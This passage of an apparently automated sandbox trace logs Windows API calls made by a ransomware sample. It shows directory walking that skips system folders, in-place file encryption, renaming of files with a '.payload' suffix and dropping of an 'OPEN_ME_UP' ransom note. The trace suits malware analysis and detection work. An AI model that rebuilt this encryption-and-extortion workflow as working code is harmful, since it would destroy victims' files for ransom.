pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 49 [0059.770] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.771] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.771] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.771] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.771] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.771] GetTickCount () returned 0x114f5fa [0059.771] GetTickCount () returned 0x114f5fa [0059.771] GetTickCount () returned 0x114f5fa [0059.771] GetTickCount () returned 0x114f5fa [0059.771] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.771] GetProcessHeap () returned 0x5e0000 [0059.771] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.771] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.773] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.773] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.773] GetProcessHeap () returned 0x5e0000 [0059.773] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.773] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.773] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.773] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.773] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.773] CloseHandle (hObject=0x438) returned 1 [0059.775] GetProcessHeap () returned 0x5e0000 [0059.775] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.775] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.775] GetProcessHeap () returned 0x5e0000 [0059.775] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.775] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.775] FindClose (in: hFindFile=0x606260 | out: hFindFile=0x606260) returned 1 [0059.775] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.775] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1053\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.776] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.777] CloseHandle (hObject=0x430) returned 1 [0059.777] GetProcessHeap () returned 0x5e0000 [0059.777] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.777] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1055", cAlternateFileName="")) returned 1 [0059.777] lstrcmpiW (lpString1="1055", lpString2="Windows") returned -1 [0059.777] lstrcmpiW (lpString1="1055", lpString2="$Recycle.bin") returned 1 [0059.777] lstrcmpiW (lpString1="1055", lpString2="System Volume Information") returned -1 [0059.777] lstrcmpiW (lpString1="1055", lpString2="Program Files") returned -1 [0059.777] lstrcmpiW (lpString1="1055", lpString2="Program Files (x86)") returned -1 [0059.777] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055") returned 30 [0059.777] lstrcmpW (lpString1="1055", lpString2=".") returned 1 [0059.777] lstrcmpW (lpString1="1055", lpString2="..") returned 1 [0059.777] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.777] GetProcessHeap () returned 0x5e0000 [0059.777] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.777] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\*") returned 32 [0059.777] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6067e0 [0059.777] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.778] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.778] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.778] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.778] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.778] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\.") returned 32 [0059.778] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.778] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.778] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.778] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.778] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.778] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.778] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.778] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\..") returned 33 [0059.778] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.778] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.778] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.778] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.778] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.778] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.778] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.778] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.778] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 39 [0059.778] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.778] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.778] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.778] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.778] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.778] GetTickCount () returned 0x114f609 [0059.778] GetTickCount () returned 0x114f609 [0059.779] GetTickCount () returned 0x114f609 [0059.779] GetTickCount () returned 0x114f609 [0059.779] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.779] GetProcessHeap () returned 0x5e0000 [0059.779] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.779] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xf13, lpOverlapped=0x0) returned 1 [0059.780] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff0ed, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.780] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xf13, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xf13, lpOverlapped=0x0) returned 1 [0059.781] GetProcessHeap () returned 0x5e0000 [0059.781] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.781] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.781] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.781] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.781] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.781] CloseHandle (hObject=0x438) returned 1 [0059.782] GetProcessHeap () returned 0x5e0000 [0059.782] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.782] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.784] GetProcessHeap () returned 0x5e0000 [0059.784] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.784] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.784] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.784] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.784] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.784] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.784] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.784] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 48 [0059.784] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.784] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.784] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.784] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.784] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.784] GetTickCount () returned 0x114f609 [0059.784] GetTickCount () returned 0x114f609 [0059.784] GetTickCount () returned 0x114f609 [0059.784] GetTickCount () returned 0x114f609 [0059.784] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.785] GetProcessHeap () returned 0x5e0000 [0059.785] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.785] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.787] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.787] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.787] GetProcessHeap () returned 0x5e0000 [0059.787] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.787] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.787] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.787] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.787] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.787] CloseHandle (hObject=0x438) returned 1 [0059.790] GetProcessHeap () returned 0x5e0000 [0059.790] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.790] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.790] GetProcessHeap () returned 0x5e0000 [0059.790] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.790] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.790] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 49 [0059.791] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.791] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.791] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.791] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.791] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.791] GetTickCount () returned 0x114f609 [0059.791] GetTickCount () returned 0x114f609 [0059.791] GetTickCount () returned 0x114f609 [0059.791] GetTickCount () returned 0x114f609 [0059.791] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.791] GetProcessHeap () returned 0x5e0000 [0059.791] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.791] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.793] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.793] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.797] GetProcessHeap () returned 0x5e0000 [0059.797] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.797] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.797] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.797] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.798] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.798] CloseHandle (hObject=0x438) returned 1 [0060.019] GetProcessHeap () returned 0x5e0000 [0060.019] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.019] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0060.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0060.020] GetProcessHeap () returned 0x5e0000 [0060.020] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.020] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.020] FindClose (in: hFindFile=0x6067e0 | out: hFindFile=0x6067e0) returned 1 [0060.020] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.020] 